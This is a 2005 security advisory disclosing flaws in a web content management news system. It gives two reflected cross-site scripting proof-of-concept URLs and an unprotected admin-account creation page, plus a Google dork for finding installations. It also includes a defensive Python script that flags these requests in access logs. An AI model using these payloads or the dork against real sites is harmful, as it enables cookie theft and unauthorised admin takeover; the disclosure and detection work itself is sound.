10.53 29/07/2005
Web Content Management News System Administrative Account creation & cross site scripting poc

author site: http://www.web-content-management.us/content-management-download.php

xss:
http://[target]/[path]/Includes/validsession.php?strRootpath=');}//%20--></script><script>alert(document.cookie)</script>
http://[target]/[path]/Admin/News/List.php?strTable=<script>alert(document.cookie)</script><!--

a simple user can inexplicably create an admin account at this url:
http://[target]/[path]/Admin/Users/AddModifyInput.php

the new admin can then go to this page:
http://[target]/[path]/Logon.php

and log in; after that he can add, modify and delete news
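
For log review, the following added example (not part of the original advisory or the product's code) flags requests to the three scripts named above in Common Log Format access logs. The sample log lines, the /cms install path and the admin_hosts list are constructed assumptions.

```python
import re
from urllib.parse import unquote, unquote_plus

# Script paths and parameters named in the advisory (paths compared in lower case).
XSS_PARAMS = {
    "/includes/validsession.php": "strRootpath",
    "/admin/news/list.php": "strTable",
}
USER_FORM = "/admin/users/addmodifyinput.php"
MARKUP = re.compile(r"[<>\"'();]")  # never needed in a path or table name
LOG_LINE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify(line, admin_hosts=frozenset()):
    """Return (client, finding) tuples for one Common Log Format line."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    client = m["client"]
    path, _, query = m["target"].partition("?")
    path = unquote(path).lower()
    findings = []
    for suffix, param in XSS_PARAMS.items():
        if not path.endswith(suffix):
            continue
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            if unquote_plus(name) == param and MARKUP.search(unquote_plus(value)):
                findings.append((client, "markup in " + param))
    # Access logs carry no role, so any client outside the known admin
    # hosts (an assumed list) that reaches the user form is queued for review.
    if path.endswith(USER_FORM) and client not in admin_hosts:
        findings.append((client, "user form reached by non-admin host"))
    return findings

def scan(lines, admin_hosts=frozenset()):
    return [f for line in lines for f in classify(line, admin_hosts)]

# Constructed sample log lines (documentation IP ranges, hypothetical /cms path).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jul/2005:10:40:01 +0200] "GET /cms/Admin/News/List.php?strTable=news HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/Jul/2005:10:41:13 +0200] "GET /cms/Admin/News/List.php?strTable=%3Cscript%3E HTTP/1.1" 200 5301',
    '198.51.100.7 - - [29/Jul/2005:10:41:40 +0200] "GET /cms/Includes/validsession.php?strRootpath=%27%29%3B HTTP/1.1" 200 812',
    '198.51.100.7 - - [29/Jul/2005:10:42:02 +0200] "POST /cms/Admin/Users/AddModifyInput.php HTTP/1.1" 200 2290',
    '192.0.2.10 - - [29/Jul/2005:10:45:30 +0200] "POST /cms/Admin/Users/AddModifyInput.php HTTP/1.1" 200 2290',
]

if __name__ == "__main__":
    for client, finding in scan(SAMPLE_LOG, admin_hosts={"192.0.2.10"}):
        print(client, finding)
```
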

googledork:
"powered by web-content-management"


rgod
email: retrogod at aliceposta.it
site: http://rgod.altervista.org